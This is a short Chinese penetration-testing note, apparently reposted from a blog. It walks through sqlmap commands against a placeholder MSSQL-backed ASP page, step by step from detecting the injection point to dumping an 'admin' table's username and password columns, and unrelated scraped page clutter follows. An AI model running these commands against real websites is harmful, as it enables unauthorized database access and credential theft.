SQLMAP渗透笔记之MSSQL数据库注入

来源:互联网 发布:南宁直销软件多少钱 编辑:程序博客网 时间:2024/05/16 00:44


   


---------------------------------------------------------------------------------------------


                SQLMAP渗透笔记之MSSQL数据库注入


                                
---------------------------------------------------------------------------------------------


1.判断注入点,获取网站信息


sqlmap.py -u http://www.xx.com/ss.asp?id=123


例:
sqlmap.py -u "http://www.xx.com/ss.asp?id=123"




2.获取所有数据库


sqlmap.py -u http://www.xx.com/ss.asp?id=123 --dbs


例:
sqlmap.py -u "http://www.xx.com/ss.asp?id=123" --dbs




3.获取网站当前所使用的数据库


sqlmap.py -u http://www.xx.com/ss.asp?id=123 --current-db


例:
sqlmap.py -u "http://www.xx.com/ss.asp?id=123" --current-db




4.获取数据库中的表名


sqlmap.py -u http://www.xx.com/ss.asp?id=123 -D 数据库名 --tables


例:
sqlmap.py -u "http://www.xx.com/ss.asp?id=123" -D news2008 --tables




5.获取数据表中的字段名
sqlmap.py -u http://www.xx.com/ss.asp?id=123 -D 数据库名 -T 表名 --columns


例:
sqlmap.py -u "http://www.xx.com/ss.asp?id=123" -D news2008 -T admin --columns


6.获取字段中的内容
sqlmap.py -u http://www.xx.com/ss.asp?id=123 -D 数据库名 -T 表名 -C "字段名1,字段名2..." --dump


例:
sqlmap.py -u "http://www.xx.com/ss.asp?id=123" -D news2008 -T admin -C "username,psw" --dump
阅读全文
'); })();
0 0
原创粉丝点击
热门IT博客
热门问题 老师的惩罚 人脸识别 我在镇武司摸鱼那些年 重生之率土为王 我在大康的咸鱼生活 盘龙之生命进化 天生仙种 凡人之先天五行 春回大明朝 姑娘不必设防,我是瞎子 用假的发票怎么办 普通发票查出假的怎么办 铁表带有异味怎么办 如家贵宾卡怎么办呀 海底捞打折卡怎么办 微信礼品卡不收怎么办 华润万家怎么办会员卡 怎么办银泰365会员卡 凉鞋扣子掉了怎么办 lv皮带长了怎么办 在实体店买到假货怎么办 电池图标变黄怎么办 关注公众号频繁怎么办 因违规无法关注怎么办 公众号关注不了怎么办 撤不回qq群消息怎么办 拼多多自动扣款怎么办 保费自动扣款了怎么办 花呗自动扣款怎么办 社保没自动扣款怎么办 godaddy自动扣款了怎么办 快贷自动扣款怎么办 广发通忘记密码怎么办 w10密码忘记了怎么办 网络连接不可用怎么办 苹果手机空间不足怎么办 苹果空间已满怎么办 淘宝店评分低怎么办 退税商品拆封了怎么办 退款申请关闭了怎么办 公众号图片侵权怎么办 qq没法发语音怎么办 139邮箱换号怎么办 qq号显示手机号怎么办 运动鞋大了怎么办妙招 鞋买小了挤脚怎么办 鞋子买太大了怎么办 买了nike betrue怎么办 手表蹭花了怎么办 迅雷登录太频繁怎么办 糖果手机声音小怎么办